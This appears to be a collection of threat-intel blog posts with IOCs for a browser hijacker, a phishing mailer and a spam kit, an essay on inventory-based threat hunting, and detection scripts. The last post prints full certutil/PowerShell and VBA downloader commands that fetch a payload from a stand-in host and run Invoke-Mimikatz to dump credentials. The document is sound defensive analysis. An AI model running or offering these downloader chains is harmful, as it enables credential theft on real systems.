Friday, December 30, 2022

Browser Hijacker HLoginAssistant.co LoginAssistantTab

 

https://app.any.run/tasks/ab008b3d-fe3b-44f2-bb5d-d6758f46d571

Browser Hijacker HLoginAssistant

Establishes persistence through a Run key in the registry:

hku\***\software\microsoft\windows\currentversion\run\IEXPLORE

url: search.hloginassistant.co

https://urlscan.io/result/8164cfc1-df93-4cd0-b7b9-a605d9e241f8/




Saturday, November 5, 2022

XtraMailer spam service phishing tool

https://twitter.com/neonprimetime/status/1589084560675201024?s=46&t=CMAHRgmBZRQ-vkxgYQ9Znw

#XtraMailer spam service for credential #phishing

urlscan.io/result/9274723…

mailer login: 62.210.81[.]212/XtraMailerLogin

stolen creds posted to: 62.210.81[.]212/next.php


https://twitter.com/prodaft/status/1286580568801640448?s=46&t=CMAHRgmBZRQ-vkxgYQ9Znw

Were here in the past:

hxxp://conferencias.falcorp[.]net
hxxp://195.154.164[.]184
hxxp://195.154.164[.]25
hxxp://62.210.72[.]29


Tool error message that exposes some internal information (server paths from the Laravel framework stack trace):

urlscan.io/dom/8f93bd4e-7…

/var/www/xtramailer/vendor/laravel/framework/src/Illuminate/Routing/
RouteCollection.php
Router.php
Pipeline.php
Foundation/Http/Kernel.php
/fideloper/proxy/src/TrustProxies.php
/Middleware/TransformsRequest
/CheckForMaintenanceMode.php
/var/www/xtramailer/public/index.php


Some related variables found for the #XtraMailer spam service #phishing tool:

FACEBOOK_CALLBACK_URL
FACEBOOK_CLIENT_ID
FACEBOOK_CLIENT_SECRET
FCGI_ROLE
GOOGLE_APPLICATION_CREDENTIALS
MAIL_PASSWORD
MAIL_USERNAME
PUSHER_APP_ID
PUSHER_APP_KEY
PUSHER_APP_SECRET
RMQ_PASSWORD
RMQ_USER





Tuesday, November 1, 2022

Mega Super Autouploader - msau

Related Social Media Posts

@500mk500
https://twitter.com/500mk500/status/1586505814839558145?s=20&t=e_pnOL_iyOz5x_fGUE5RpQ

Mega Super Autouploader
https://github.com/stamparm/maltrail/commit/7fca81e41937db476b1ddec47a7f01d1152355d6

Login pages found:
http://analiticslist[.]com/msau/
http://solien[.]cc/msau/

Related Domains


Root folder names:
www/megauploader.xyz/
www/msau/
www/msau_jml/
www/msau2612/

Files in the kit:
work.php
Core/MainSettings.php
DrwContent/ProcessingMacroses.php
DrwContent/ProcessResTemplate.php
DrwContent/Prs.php
DrwContent/GetContent.php

Sample errors found:
Deprecated: Implicit conversion from float 522588.00000000006 to int loses precision in /var/www/html/msau/Core/MainSettings.php on line 357

Deprecated: Implicit conversion from float 252717.00000000003 to int loses precision in /var/www/html/msau/DrwContent/Prs.php on line 90



Warning: preg_replace(): Unknown modifier '\' in /var/www/www-root/data/www/megauploader.xyz/DrwContent/ProcessResTemplate.php on line 83





Warning: shuffle() expects parameter 1 to be array, string given in /var/www/www-root/data/www/megauploader.xyz/Core/MainSettings.php on line 358

Warning: implode(): Invalid arguments passed in /var/www/www-root/data/www/megauploader.xyz/DrwContent/ProcessingMacroses.php on line 122


Warning: implode(): Invalid arguments passed in /var/www/www-root/data/www/megauploader.xyz/DrwContent/ProcessingMacroses.php on line 139



Fatal error: Uncaught TypeError: preg_replace_callback(): Argument #2 ($callback) must be a valid callback, function "strip_tags_smart" not found or invalid function name in /var/www/html/msau/Core/MainSettings.php:590 Stack trace: #0 /var/www/html/msau/Core/MainSettings.php(590): preg_replace_callback('~ <[/!]?+\n ...', 'strip_tags_smar...', '510 E 84th Stre...') #1 /var/www/html/msau/DrwContent/Prs.php(168): MainSettings->strip_tags_smart('510 E 84th Stre...') #2 /var/www/html/msau/DrwContent/GetContent.php(26): Prs->getSnippets('education+princ...', 7) #3 /var/www/html/msau/work.php(248): GetContent->__construct(Object(MainSettings), 'education princ...', '1f13728d2ef56b6...', Object(Prs)) #4 {main} thrown in /var/www/html/msau/Core/MainSettings.php on line 590


Deprecated: Implicit conversion from float 519715.00000000006 to int loses precision in /var/www/html/msau_jml/Core/MainSettings.php on line 358

Fatal error: Uncaught TypeError: shuffle(): Argument #1 ($array) must be of type array, string given in /var/www/html/msau_jml/Core/MainSettings.php:359 Stack trace: #0 /var/www/html/msau_jml/Core/MainSettings.php(359): shuffle('Ivermectin wher...') #1 /var/www/html/msau_jml/DrwContent/ProcessingMacroses.php(121): MainSettings->shuffleArr('Ivermectin wher...') #2 /var/www/html/msau_jml/DrwContent/ProcessingMacroses.php(31): ProcessingMacroses->UPMIXKEY() #3 /var/www/html/msau_jml/work.php(258): ProcessingMacroses->goWork() #4 {main} thrown in /var/www/html/msau_jml/Core/MainSettings.php on line 359
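The leaked error messages above give away the kit's root folders and file layout. As an added example that is not part of the original post, this script pulls the file paths out of constructed error lines modelled on the ones quoted here and groups them by kit root; the Core/, DrwContent/ and work.php markers come from the file list above, everything else is my own.

```python
import re
from collections import defaultdict

# Constructed sample lines, modelled on the PHP errors quoted in this post.
SAMPLE_ERRORS = r"""
Deprecated: Implicit conversion from float 522588.00000000006 to int loses precision in /var/www/html/msau/Core/MainSettings.php on line 357
Warning: preg_replace(): Unknown modifier '\' in /var/www/www-root/data/www/megauploader.xyz/DrwContent/ProcessResTemplate.php on line 83
Warning: shuffle() expects parameter 1 to be array, string given in /var/www/www-root/data/www/megauploader.xyz/Core/MainSettings.php on line 358
Fatal error: Uncaught TypeError: shuffle(): Argument #1 ($array) must be of type array, string given in /var/www/html/msau_jml/Core/MainSettings.php:359 Stack trace: #0 /var/www/html/msau_jml/Core/MainSettings.php(359): shuffle('Ivermectin wher...') #1 /var/www/html/msau_jml/DrwContent/ProcessingMacroses.php(121): MainSettings->shuffleArr('Ivermectin wher...') #3 /var/www/html/msau_jml/work.php(258): ProcessingMacroses->goWork() #4 {main}
"""

# PHP reports file locations as "<path> on line N", "<path>:N" (fatal errors)
# and "<path>(N)" (stack frames); capture all three forms.
PATH_RE = re.compile(r"(/[\w./-]+\.php)(?: on line |:|\()(\d+)")

# Top-level kit entries taken from the "Files in the kit" list above.
KIT_MARKERS = ("Core", "DrwContent", "work.php")


def extract_paths(text):
    """Unique (absolute_path, line_number) pairs found in PHP error output."""
    return sorted({(path, int(num)) for path, num in PATH_RE.findall(text)})


def split_kit_path(path):
    """Split a path into (kit_root, path_inside_kit), or None if no kit marker is in it."""
    parts = path.split("/")
    for i, part in enumerate(parts):
        if part in KIT_MARKERS:
            return "/".join(parts[:i]) + "/", "/".join(parts[i:])
    return None


def root_folder_name(root):
    """Last two components of a root, e.g. 'www/msau/', the way the post lists them."""
    return "/".join(root.rstrip("/").split("/")[-2:]) + "/"


def fingerprint(text):
    """Map each kit root seen in the errors to its sorted (relative file, line) pairs."""
    roots = defaultdict(set)
    for path, line in extract_paths(text):
        hit = split_kit_path(path)
        if hit:
            root, rel = hit
            roots[root].add((rel, line))
    return {root: sorted(files) for root, files in roots.items()}


if __name__ == "__main__":
    for root, files in fingerprint(SAMPLE_ERRORS).items():
        print(root_folder_name(root), files)
```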

Notes:
Seems related to WordPress sites.
Seems like redirect spam to porn, pharma, SEO spam, etc.

Wednesday, October 19, 2022

IDA Pro Reversing notes

Notes just for my own learning

CPPEH_RECORD = C++ exception handling record
__guard_check_icall_fptr = Control Flow Guard (indirect call check)
_initterm = initializer function pointer table


Friday, March 18, 2022

A Threat Hunting approach using Inventory

You've probably heard it mentioned that one of the first steps in cybersecurity is asset inventory. I can tell you first hand this is so true. How can you protect things if you don't know what you have? Sadly, everywhere I've worked, and I think this is a struggle everywhere, it's been a challenge just knowing what you have. I'm not just speaking about workstation, server, or user names. Other examples would be software titles, publishers, and executable names.

I wanted to share with you something I've been doing as a "Threat Hunter". You may think it's interesting to take a list of IOCs (indicators of compromise) like malicious IPs, file hashes, file names, URLs, or domains and hunt for them on your network. If they are targeted and relevant IOCs, that's not a bad idea, but the odds of you getting a hit are low. Threat actors are very skilled nowadays and have simple ways to generate brand new IPs, domains, URLs, file names, and file hashes per target, per victim, and even per user.

Another, more advanced and potentially good, threat hunt would be to look for a tactic/technique a threat actor may use: certain parameters being passed to an executable, certain port and protocol traffic on your network, certain file extensions in emails, etc. This is cool and could be worthwhile, but it is also like finding a needle in a haystack. The MITRE ATT&CK matrix has hundreds of techniques, and there are so many variations of each technique that the threat actor has the advantage. If they tweak their method ever so slightly, your search may find nothing.

So, what's an even better method? Here I go back to asset inventory: knowing what you have in your environment. At my current work I have massive lists, built over the years, of various things ...

  • All executable names I've ever seen in the environment
  • All software publishers I've ever seen in the environment
  • All file names I've ever seen in the Windows folder
  • All domains I've ever seen our IoT network connect to
  • All domains I've ever seen Windows applications (excluding browsers) reach out to
  • All Scheduled Tasks that have ever been created
  • All Windows Services that have ever been installed
  • more random ideas :-)

Hopefully you get the picture: massive lists of things I've done at least some level of vetting on, even if it's 30 seconds with a Google search, to have some comfort level that they're probably normal or expected. I have experience doing this for perhaps 15,000 or more systems, and I'm still able to build these lists; believe me, it wasn't as hard as I expected. Now of course, if you work at a larger organization than that, this could get significantly more challenging. But if you're at a smaller business, I can honestly say I think it's doable.

So, why do I have all these lists? I think in many ways this is my best approach, or best chance, for finding malicious activity; it's the best approach I've found so far for threat hunting. Instead of looking for malicious IOCs that have a short life and become useless quickly, and instead of searching for odd tactics and techniques that may or may not have been used by my threat actors, I look for stuff that I've never seen before in our environment.

Imagine the following:

  • An executable just started running that has never been seen at my work before. That's a good threat hunt find to dig into.
  • A program from a software publisher that has never before been used at work runs. That's a good threat hunt find to dig into.
  • A program reaches out to a domain that has never been connected to at work before. That's a good threat hunt find to dig into.
  • A scheduled task just got added to a PC that has never been seen before on any PC. That's a good threat hunt find to dig into.

It's my belief that this is a great way to find anomalies and potentially malicious activity.

A threat actor can change their IOCs, a threat actor can change their technique, but in the overall big picture it's going to be hard for a threat actor to generate ONLY program names, URLs, domains, IPs, scheduled tasks, or Windows services that have already been seen.

The odds are that the threat actor will generate a few program names, URLs, domains, IPs, scheduled tasks, or Windows services that have never been seen before at my work ... and hopefully those show up on my hunt because they don't exist in my list yet ... and hopefully I can identify that they are malicious before the threat actor does anything detrimental.
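As an added example, not the author's own tooling, here is the baseline-diff hunt described above in Python: one vetted inventory set per category, a day of constructed observations, the never-seen-before items grouped by host, and a step to fold vetted items back into the baseline. Every host name and every value in BASELINE and OBSERVATIONS is constructed.

```python
# Constructed baseline: one set per inventory category, everything in it
# already vetted as normal for the environment (as the post describes).
BASELINE = {
    "executables": {"explorer.exe", "outlook.exe", "chrome.exe", "svchost.exe"},
    "publishers": {"microsoft corporation", "google llc"},
    "domains": {"update.microsoft.com", "clients2.google.com"},
    "scheduled_tasks": {"\\microsoft\\windows\\defrag\\scheduleddefrag"},
}

# Constructed observations from one day of telemetry: (category, value, host).
OBSERVATIONS = [
    ("executables", "Explorer.EXE", "PC-01"),
    ("executables", "updsvc.exe", "PC-07"),
    ("publishers", "Microsoft Corporation", "PC-01"),
    ("publishers", "Hermetica Digital Ltd", "PC-07"),
    ("domains", "update.microsoft.com", "PC-01"),
    ("domains", "cdn-files.example", "PC-07"),
    ("scheduled_tasks", "\\OneDriveUpdate", "PC-07"),
]


def normalize(value):
    """Case and surrounding whitespace carry no meaning for these names."""
    return value.strip().lower()


def hunt(baseline, observations):
    """Return {category: {value: [hosts]}} for values never seen in the baseline."""
    findings = {}
    for category, value, host in observations:
        norm = normalize(value)
        if norm in baseline.get(category, set()):
            continue  # already vetted, nothing to look at
        findings.setdefault(category, {}).setdefault(norm, set()).add(host)
    return {c: {v: sorted(h) for v, h in vals.items()} for c, vals in findings.items()}


def hosts_by_novelty(findings):
    """Count never-seen items per host; a host tripping several categories is triaged first."""
    counts = {}
    for vals in findings.values():
        for hosts in vals.values():
            for host in hosts:
                counts[host] = counts.get(host, 0) + 1
    return counts


def promote(baseline, vetted):
    """After review, add vetted (category, value) pairs to the baseline so they stop surfacing."""
    for category, value in vetted:
        baseline.setdefault(category, set()).add(normalize(value))
    return baseline
```

Run `hosts_by_novelty(hunt(BASELINE, OBSERVATIONS))` to see that one host accounts for every new item in this sample; that is the machine to start with.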

 

Friday, March 11, 2022

Hermetic Wiper Publisher for AppLocker

Hermetic Wiper "View Certificate" details for your AppLocker publisher blocking pleasures:


CN = Hermetica Digital Ltd
O = Hermetica Digital Ltd
L = Nicosia
C = CY






Thursday, January 13, 2022

downloader certutil powershell invoke-mimikatz

Sample downloader that executed Mimikatz:

certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';
$B64 = get-content test.txt ;
$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));
$clear |out-file -filepath 'test.txt';
powershell -version 2 -command "iex (get-content 'test.txt'|out-string);
Invoke-Mimikatz -DumpCreds


VBA macro downloader for Invoke-Mimikatz:

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")
Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")
Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")
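To turn the two samples above into something a defender can use, this added example (not code from the post) runs a few detection rules over constructed process-creation events modelled on them: the certutil -urlcache download, the PowerShell -version 2 downgrade, inline Base64 decoding, iex over a file, the Invoke-Mimikatz cmdlet, and an Office parent process. The event format, the rule names and the host names are my own assumptions.

```python
import re

# Detection rules for the stages seen in the samples above. Rule names are
# my own; each regex runs against the full process command line.
RULES = [
    ("certutil_download", re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*-f\b.*https?://", re.I)),
    ("powershell_v2_downgrade", re.compile(r"powershell(\.exe)?\b.*-version\s+2\b", re.I)),
    ("inline_base64_decode", re.compile(r"FromBase64String", re.I)),
    ("iex_from_file", re.compile(r"\biex\b.*get-content", re.I)),
    ("mimikatz_cmdlet", re.compile(r"invoke-mimikatz", re.I)),
]

# Parents that should not be spawning certutil or PowerShell in most environments.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed process-creation events modelled on the post's samples;
# the last one is benign certutil use that must not trigger.
EVENTS = [
    {"host": "PC-07", "parent": "winword.exe",
     "cmd": "certutil.exe -urlcache -split -f http://somewhere/test4.txt tes5.txt"},
    {"host": "PC-07", "parent": "winword.exe",
     "cmd": "powershell.exe -noprofile -command \"start-sleep -s 5; $B64 = get-content 'test.txt'; "
            "$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64))\""},
    {"host": "PC-07", "parent": "cmd.exe",
     "cmd": "c:\\windows\\sysnative\\windowspowershell\\v1.0\\powershell.exe -version 2 -noprofile "
            "-noexit -command \"iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami'\""},
    {"host": "PC-01", "parent": "explorer.exe",
     "cmd": "certutil.exe -hashfile C:\\setup.exe SHA256"},
]


def classify(event):
    """Names of every rule the event trips; an Office parent adds its own flag."""
    hits = [name for name, rx in RULES if rx.search(event["cmd"])]
    if hits and event["parent"].lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    return hits


def rules_per_host(events):
    """Distinct rules tripped per host; a host hitting several stages of the chain ranks first."""
    seen = {}
    for event in events:
        for name in classify(event):
            seen.setdefault(event["host"], set()).add(name)
    return {host: sorted(names) for host, names in seen.items()}


if __name__ == "__main__":
    for host, names in rules_per_host(EVENTS).items():
        print(host, names)
```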